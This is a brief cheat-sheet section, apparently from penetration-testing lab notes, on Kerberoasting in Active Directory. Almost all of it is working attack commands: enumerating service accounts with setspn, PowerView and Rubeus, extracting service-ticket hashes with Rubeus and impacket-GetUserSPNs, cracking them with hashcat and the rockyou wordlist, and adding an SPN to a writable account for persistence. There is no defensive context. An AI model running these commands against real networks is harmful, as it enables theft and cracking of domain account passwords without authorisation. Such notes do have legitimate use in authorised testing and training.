4. Kerberoasting



Enumerate Kerberoastable users:

setspn.exe -Q */*
Get-NetUser -SPN | select serviceprincipalname
\Rubeus.exe kerberoast /stats

Local Kerberoasting with Rubeus:

  1. Start the roast:
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
  1. Crack hash on kali:
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Remote Kerberoasting with Impacket:

  1. Start the roast:
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
  1. Crack hash:
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Targeted Kerberoasting Abuse/Persistence:

Make user kerberoastable where we have write privileges:

Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose